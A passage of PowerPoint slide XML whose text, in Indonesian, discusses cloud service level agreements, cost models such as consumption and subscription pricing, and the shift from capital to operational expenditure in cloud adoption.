            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SLA) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjamin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>waktu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembalian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komitmen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pertimbangan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fokus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekadar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adopsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkait</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjalankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cloud, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkirakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>migrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergeseran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modal (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CapEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>OpEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Capex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membeli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lisensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyiapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebaliknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibayar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembayaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>CapEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>OpEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsumsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>investasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>muka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Model </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>OpEx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fleksibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skalabilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengoptimalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membayar</a:t>
            </a:r>
            <a:r>
